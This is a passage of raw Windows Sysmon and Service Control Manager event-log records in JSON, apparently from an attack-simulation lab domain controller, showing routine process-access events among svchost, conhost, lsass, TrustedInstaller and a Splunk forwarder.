C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2806,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2807,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2808,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2809,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:37.627\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FBD-5F25-0000-001040EB0400}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:37.627","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FBD-5F25-0000-001040EB0400}","TargetProcessId":"4592","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2810,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:59.328\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:59.328","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2811,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:59.328\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-0010B46A0100}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\system32\\compattelrunner.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:59.328","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-0010B46A0100}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\system32\\compattelrunner.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76845,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The TrustedInstaller service entered the stopped state.","param1":"TrustedInstaller","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:15","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2812,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:15.196\r\nSourceProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nSourceProcessId: 2964\r\nSourceThreadId: 2980\r\nSourceImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010018A0200}\r\nTargetProcessId: 3016\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\System32\\combase.dll+669f8|C:\\Windows\\servicing\\TrustedInstaller.exe+43a2|C:\\Windows\\servicing\\TrustedInstaller.exe+1d1d|C:\\Windows\\servicing\\TrustedInstaller.exe+28c6|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 